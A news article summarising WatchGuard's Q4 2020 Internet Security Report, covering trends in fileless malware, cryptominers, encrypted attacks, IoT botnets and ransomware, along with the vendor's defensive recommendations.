Fileless malware rates in 2020 increased by 888% over 2019, according to WatchGuard.
One problem with fileless attacks is that they can evade detection by traditional endpoint protection products. Another is that all it takes to become a victim is visiting a malicious or compromised web page.
Once the malware is delivered, toolkits such as PowerSploit and CobaltStrike can be used to inject malicious code into legitimate processes, which will continue to run even if the script that delivered the code is detected and removed.
Applying endpoint detection and response alongside regular anti-malware products can help identify these threats.
Cryptocurrency prices have trended upwards, and cryptominer malware detections climbed more than 25% in 2020. 850 unique variants were detected during the year.
Double-digit growth was also seen in encrypted malware attacks. In the fourth quarter of 2020, 47% of all attacks detected by WatchGuard at the network perimeter were encrypted.
A new trojan – Trojan.Script.1026663 – found its way around email scanners and entered WatchGuard's list of the top five most-widespread malware detections in the same period. An email asking victims to review an order list attachment, but the malicious document triggers a series of payloads and malicious code that ultimately installs the Agent Tesla remote access trojan (RAT) and keylogger.
Botnet malware targeting IoT devices and routers is a growing issue. The Linux.Generic virus (aka The Moon) entered WatchGuard's list of top 10 malware detections. Linux-specific malware designed for ARM processors and another payload designed for MIPS processors shows a clear attack on IoT devices.
Despite some well-publicised cases, ransomware attack volumes shrank for the second year running. The number of unique ransomware payloads also continued to fall, from a record 5,489 in 2018 to 4,131 in 2019 and 2,152 in 2020. Each variant may have infected hundreds or thousands of endpoints worldwide.
Most ransomware detections were against signatures implemented in 2017 to detect WannaCry and related variants.
The decline in volume reflects a shift from scattergun campaigns to highly targeted attacks against targets that are particularly sensitive to downtime, including healthcare organisations and manufacturing firms.
In 4Q20, WatchGuard appliances blocked more than 20.6 million malware variants (456 per device) and nearly 3.5 million network threats (77 detections per appliance).
"The rise in sophisticated, evasive threat tactics last quarter and throughout 2020 showcases how vital it is to implement layered, end-to-end security protections," said WatchGuard CTO Corey Nachreiner.
"The attacks are coming on all fronts, as cyber criminals increasingly leverage fileless malware, cryptominers, encrypted attacks and more, and target users both at remote locations as well as corporate assets behind the traditional network perimeter. Effective security today means prioritising endpoint detection and response, network defences and foundational precautions such as security awareness training and strict patch management."
WatchGuard's Q4 2020 Internet Security Report is available here.